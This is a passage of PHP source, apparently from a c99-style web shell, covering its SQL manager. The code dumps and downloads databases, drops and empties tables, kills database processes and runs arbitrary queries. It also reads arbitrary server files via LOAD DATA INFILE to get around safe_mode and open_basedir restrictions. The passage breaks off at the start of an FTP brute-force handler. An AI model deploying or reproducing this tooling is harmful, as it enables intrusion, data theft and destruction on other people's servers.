1277         ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
1278         <?php
1279         $c = 0;
1280         $dbs = "";
1281         while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
1282         echo "<option value=\"\">Databases (".$c.")</option>";
1283         echo $dbs;
1284       }
1285       ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
1286       <?php
1287     }
1288     //End left panel
1289     echo "</td><td width=\"100%\">";
1290     //Start center panel
1291     $diplay = TRUE;
1292     if ($sql_db) {
1293       if (!is_numeric($c)) {$c = 0;}
1294       if ($c == 0) {$c = "no";}
1295       echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
1296       if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
1297       echo "</b></center>";
1298       $acts = array("","dump");
1299       if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1300       elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
1301       elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
1302       elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1303       elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1304       elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1305       elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1306       elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
1307       elseif ($sql_tbl_act == "insert") {
1308         if ($sql_tbl_insert_radio == 1) {
1309           $keys = "";
1310 
1311           $akeys = array_keys($sql_tbl_insert);
1312           foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1313           if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1314           $values = "";
1315           $i = 0;
1316           foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1317           if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1318           $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1319           $sql_act = "query";
1320           $sql_tbl_act = "browse";
1321         }
1322         elseif ($sql_tbl_insert_radio == 2) {
1323           $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1324           $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1325           $result = mysql_query($sql_query) or print(mysql_smarterror());
1326           $result = mysql_fetch_array($result, MYSQL_ASSOC);
1327           $sql_act = "query";
1328           $sql_tbl_act = "browse";
1329         }
1330       }
1331       if ($sql_act == "query") {
1332         echo "<hr size=\"1\" noshade>";
1333         if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1334         if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
1335         if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
1336       }
1337       if (in_array($sql_act,$acts)) {
1338         ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
1339         <form action="<?php echo $surl; ?>">
1340         <input type="hidden" name="act" value="sql">
1341         <input type="hidden" name="sql_act" value="newtbl">
1342         <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
1343         <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
1344         <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
1345         <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
1346         <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
1347         <input type="text" name="sql_newtbl" size="20">
1348         <input type="submit" value="Create">
1349         </form></td>
1350         <td width="30%" height="1"><b>Dump DB:</b>
1351         <form action="<?php echo $surl; ?>">
1352         <input type="hidden" name="act" value="sql">
1353         <input type="hidden" name="sql_act" value="dump">
1354         <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
1355         <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
1356         <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
1357         <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
1358         <?php
1359         if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
1360         if ($sql_act == "newtbl") {
1361           echo "<b>";
1362           if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
1363             echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1364           }
1365           else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1366         }
1367         elseif ($sql_act == "dump") {
1368           if (empty($submit)) {
1369             $diplay = FALSE;
1370             echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1371             echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1372             $v = join (";",$dmptbls);
1373             echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1374             if ($dump_file) {$tmp = $dump_file;}
1375             else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1376             echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1377             echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1378             echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1379             echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
1380             echo "</form>";
1381           }
1382           else {
1383             $diplay = TRUE;
1384             $set = array();
1385             $set["sock"] = $sql_sock;
1386             $set["db"] = $sql_db;
1387             $dump_out = "download";
1388             $set["print"] = 0;
1389             $set["nl2br"] = 0;
1390             $set[""] = 0;
1391             $set["file"] = $dump_file;
1392             $set["add_drop"] = TRUE;
1393             $set["onlytabs"] = array();
1394             if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1395             $ret = mysql_dump($set);
1396             if ($sql_dump_download) {
1397               @ob_clean();
1398               header("Content-type: application/octet-stream");
1399               header("Content-length: ".strlen($ret));
1400               header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1401               echo $ret;
1402               exit;
1403             }
1404             elseif ($sql_dump_savetofile) {
1405               $fp = fopen($sql_dump_file,"w");
1406               if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1407               else {
1408                 fwrite($fp,$ret);
1409                 fclose($fp);
1410                 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1411               }
1412             }
1413             else {echo "<b>Dump: nothing to do!</b>";}
1414           }
1415         }
1416         if ($diplay) {
1417     if (!empty($sql_tbl)) {
1418       if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
1419       $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1420       $count_row = mysql_fetch_array($count);
1421       mysql_free_result($count);
1422       $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1423       $tbl_struct_fields = array();
1424       while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1425       if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
1426       if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
1427       if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
1428       if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
1429       $perpage = $sql_tbl_le - $sql_tbl_ls;
1430       if (!is_numeric($perpage)) {$perpage = 10;}
1431       $numpages = $count_row[0]/$perpage;
1432       $e = explode(" ",$sql_order);
1433       if (count($e) == 2) {
1434         if ($e[0] == "d") {$asc_desc = "DESC";}
1435         else {$asc_desc = "ASC";}
1436         $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1437       }
1438       else {$v = "";}
1439       $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1440       $result = mysql_query($query) or print(mysql_smarterror());
1441       echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1442       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
1443       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
1444       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
1445       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1446       if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
1447       if ($sql_tbl_act == "insert") {
1448         if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1449         if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
1450         else {
1451           echo "<br><br><b>Inserting row into table:</b><br>";
1452           if (!empty($sql_tbl_insert_q)) {
1453             $sql_query = "SELECT * FROM `".$sql_tbl."`";
1454             $sql_query .= " WHERE".$sql_tbl_insert_q;
1455             $sql_query .= " LIMIT 1;";
1456             $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1457             $values = mysql_fetch_assoc($result);
1458             mysql_free_result($result);
1459           }
1460           else {$values = array();}
1461           echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
1462           foreach ($tbl_struct_fields as $field) {
1463             $name = $field["Field"];
1464             if (empty($sql_tbl_insert_q)) {$v = "";}
1465             echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1466             $i++;
1467           }
1468           echo "</table><br>";
1469           echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1470           if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1471           echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
1472         }
1473       }
1474       if ($sql_tbl_act == "browse") {
1475         $sql_tbl_ls = abs($sql_tbl_ls);
1476         $sql_tbl_le = abs($sql_tbl_le);
1477         echo "<hr size=\"1\" noshade>";
1478         echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
1479         $b = 0;
1480         for($i=0;$i<$numpages;$i++) {
1481           if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1482           echo $i;
1483           if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1484           if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1485           else {echo "&nbsp;";}
1486         }
1487         if ($i == 0) {echo "empty";}
1488         echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
1489         echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
1490         echo "<tr>";
1491         echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
1492         for ($i=0;$i<mysql_num_fields($result);$i++) {
1493           $v = mysql_field_name($result,$i);
1494           if ($e[0] == "a") {$s = "d"; $m = "asc";}
1495           else {$s = "a"; $m = "desc";}
1496           echo "<td>";
1497           if (empty($e[0])) {$e[0] = "a";}
1498           if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1499           else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
1500           echo "</td>";
1501         }
1502       echo "<td><font color=\"green\"><b>Action</b></font></td>";
1503       echo "</tr>";
1504       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1505        echo "<tr>";
1506        $w = "";
1507        $i = 0;
1508        foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
1509        if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
1510        echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1511        $i = 0;
1512        foreach ($row as $k=>$v)
1513        {
1514         $v = htmlspecialchars($v);
1515         if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
1516         echo "<td>".$v."</td>";
1517         $i++;
1518        }
1519        echo "<td>";
1520        echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
1521        echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
1522        echo "</td>";
1523        echo "</tr>";
1524       }
1525       mysql_free_result($result);
1526       echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1527       echo "<option value=\"\">With selected:</option>";
1528       echo "<option value=\"deleterow\">Delete</option>";
1529       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
1530      }
1531     }
1532     else {
1533      $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1534      if (!$result) {echo mysql_smarterror();}
1535      else
1536      {
1537       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
1538       $i = 0;
1539       $tsize = $trows = 0;
1540       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1541       {
1542        $tsize += $row["Data_length"];
1543        $trows += $row["Rows"];
1544        $size = view_size($row["Data_length"]);
1545        echo "<tr>";
1546        echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
1547        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
1548        echo "<td>".$row["Rows"]."</td>";
1549        echo "<td>".$row["Type"]."</td>";
1550        echo "<td>".$row["Create_time"]."</td>";
1551        echo "<td>".$row["Update_time"]."</td>";
1552        echo "<td>".$size."</td>";
1553        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
1554        echo "</tr>";
1555        $i++;
1556       }
1557       echo "<tr bgcolor=\"000000\">";
1558       echo "<td><center><b>+</b></center></td>";
1559       echo "<td><center><b>".$i." table(s)</b></center></td>";
1560       echo "<td><b>".$trows."</b></td>";
1561       echo "<td>".$row[1]."</td>";
1562       echo "<td>".$row[10]."</td>";
1563       echo "<td>".$row[11]."</td>";
1564       echo "<td><b>".view_size($tsize)."</b></td>";
1565       echo "<td></td>";
1566       echo "</tr>";
1567       echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1568       echo "<option value=\"\">With selected:</option>";
1569       echo "<option value=\"tbldrop\">Drop</option>";
1570       echo "<option value=\"tblempty\">Empty</option>";
1571       echo "<option value=\"tbldump\">Dump</option>";
1572       echo "<option value=\"tblcheck\">Check table</option>";
1573       echo "<option value=\"tbloptimize\">Optimize table</option>";
1574       echo "<option value=\"tblrepair\">Repair table</option>";
1575       echo "<option value=\"tblanalyze\">Analyze table</option>";
1576       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
1577       mysql_free_result($result);
1578      }
1579     }
1580    }
1581    }
1582   }
1583   else {
1584    $acts = array("","newdb","serverstatus","servervars","processes","getfile");
1585    if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
1586    if (!empty($sql_act)) {
1587     echo "<hr size=\"1\" noshade>";
1588     if ($sql_act == "newdb") {
1589      echo "<b>";
1590      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1591      else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1592     }
1593     if ($sql_act == "serverstatus") {
1594      $result = mysql_query("SHOW STATUS", $sql_sock);
1595      echo "<center><b>Server-status variables:</b><br><br>";
1596      echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1597      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1598      echo "</table></center>";
1599      mysql_free_result($result);
1600     }
1601     if ($sql_act == "servervars") {
1602      $result = mysql_query("SHOW VARIABLES", $sql_sock);
1603      echo "<center><b>Server variables:</b><br><br>";
1604      echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1605      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1606      echo "</table>";
1607      mysql_free_result($result);
1608     }
1609     if ($sql_act == "processes") {
1610      if (!empty($kill)) {
1611        $query = "KILL ".$kill.";";
1612        $result = mysql_query($query, $sql_sock);
1613        echo "<b>Process #".$kill." was killed.</b>";
1614      }
1615      $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1616      echo "<center><b>Processes:</b><br><br>";
1617      echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
1618      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1619      echo "</table>";
1620      mysql_free_result($result);
1621     }
1622     if ($sql_act == "getfile")
1623     {
1624      $tmpdb = $sql_login."_tmpdb";
1625      $select = mysql_select_db($tmpdb);
1626      if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1627      if ($select)
1628      {
1629       $created = FALSE;
1630       mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1631       mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1632       $result = mysql_query("SELECT * FROM tmp_file;");
1633       if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1634       else
1635       {
1636        for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
1637        $f = "";
1638        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
1639        if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1640        else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1641        mysql_free_result($result);
1642        mysql_query("DROP TABLE tmp_file;");
1643       }
1644      }
1645      mysql_drop_db($tmpdb); //comment it if you want to leave database
1646     }
1647    }
1648   }
1649 }
1650 echo "</td></tr></table>";
1651 if ($sql_sock) {
1652   $affected = @mysql_affected_rows($sql_sock);
1653   if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
1654   echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
1655 }
1656 echo "</table>";
1657 }
1658 //End of SQL Manager
1659 if ($act == "ftpquickbrute") {
